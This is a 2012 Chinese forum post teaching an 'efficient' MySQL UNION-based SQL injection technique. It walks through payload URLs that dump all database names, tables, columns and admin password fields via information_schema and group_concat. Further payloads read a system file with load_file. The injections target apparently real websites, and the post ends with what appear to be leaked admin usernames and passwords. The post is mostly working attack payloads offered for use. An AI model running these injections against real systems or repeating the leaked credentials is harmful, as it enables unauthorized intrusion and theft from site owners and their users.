找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2369|回复: 0
打印 上一主题 下一主题

mysql注入高效方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:37:34 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似  C( }' q3 g) s2 [
但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人- ]1 i7 ]  a: M3 X8 Z

' I: \/ |8 k; M) U& u
" _% F' K4 |/ `! p4 _5 f8 }& K优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入
, @& H# _6 U: F; i) ]( b% @6 I% g# X5 K; T) v, a9 T. _8 ?1 [) p6 W
缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...8 P; z" S0 \/ y" }3 M6 R. m) J

; s5 G" a6 @, s/ V' [" }. \下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示. E% f) j& k( i9 g) |
在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ ,  + 等等$ T: D( Z* f: H* p( c, `# q
$ I" A& a* j+ U  M/ M$ r# ]
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17
  p4 q# F5 Q6 F1 n* S9 j1 Q4 m$ r  P3 |3 J6 i! Z" a( A: c* F
读出所有库:
" L# r: A9 q; ?2 U; ^' K- Dhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA
) b9 R! Q0 h' _5 U9 K( c: Q* V7 s# u- a" K. P5 l  h7 ?' K

; J9 z$ r$ p8 p) n7 D2 D
) j, h& ^9 |' {7 X2 q读出所有表:
' w" c3 r% s/ @7 B0 [! g9 @http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()5 B/ @8 g. R5 Y" @1 A3 b

3 _; E& L! t+ a, ^& L* c3 N读出所有表字段:
- a5 E3 R' X1 a9 whttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)0 d+ I  ^7 p$ B, Q1 L/ P$ K! Y
*/ (97,100,109,105,110)为admin的ascii码 依次类推) _) u" m# F, {" p% h9 X; J' L1 m
9 @; k( p1 \- Y% {% _
读出所有表字段里的内容:
" ?; s# B" g( f" shttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin
( w# _) ]4 N8 x9 d7 F& ?8 j/ f7 G1 y( e/ B& K. J) D' }

% H0 E# m8 s$ c- c% |4 l
, o2 x) m' H% ~  c& ~4 j! n1 g! D- Q, E1 [) Y
1 h+ w; a: Z5 e

4 _' \: u! E) E# R# N* N3 khttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23& o# R' _" w; R+ Y
6 r, t2 h) N( I

# q0 ^. {& ]1 T% g4 A! @http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23$ b' ]  _" |& t. v. c- {! G
9 d: `' u9 ~: Y, N9 G
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23  \; W: M. x1 W/ O0 U8 H: Z

$ V/ w2 @, m7 F) S/ @. |( w$ @6 ~: ^4 S4 G) [" R7 s9 G
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23
3 G" P2 u7 t2 H, {8 w# a
" C- l& z9 Z  b4 }; w  R; d$ O& X: M1 x4 b' \4 I# x" N9 ]
        webmaster:dzb521123,simlab:simadmin20043233( ?* Z' Y! C- ~  K8 X8 Y  T
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表